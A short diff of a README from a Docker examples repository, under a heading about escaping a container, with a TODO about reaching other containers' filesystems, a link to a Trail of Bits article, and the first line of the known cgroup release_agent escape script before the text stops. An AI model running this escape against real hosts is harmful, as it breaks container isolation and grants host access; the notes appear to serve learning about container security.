chrisguest75/docker_examples/05_root_user/README.md

 ## Escape the container
 This will only work on Linux.
 It doesn't work on Docker for Desktop.

+**TODO** Can I use this to get access to another container filesystem without being in same namespace?
 [understanding-docker-container-escapes](https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/)
 ```
 d=`dirname $(ls -x /s*/fs/c*/*/r* |head -n1)`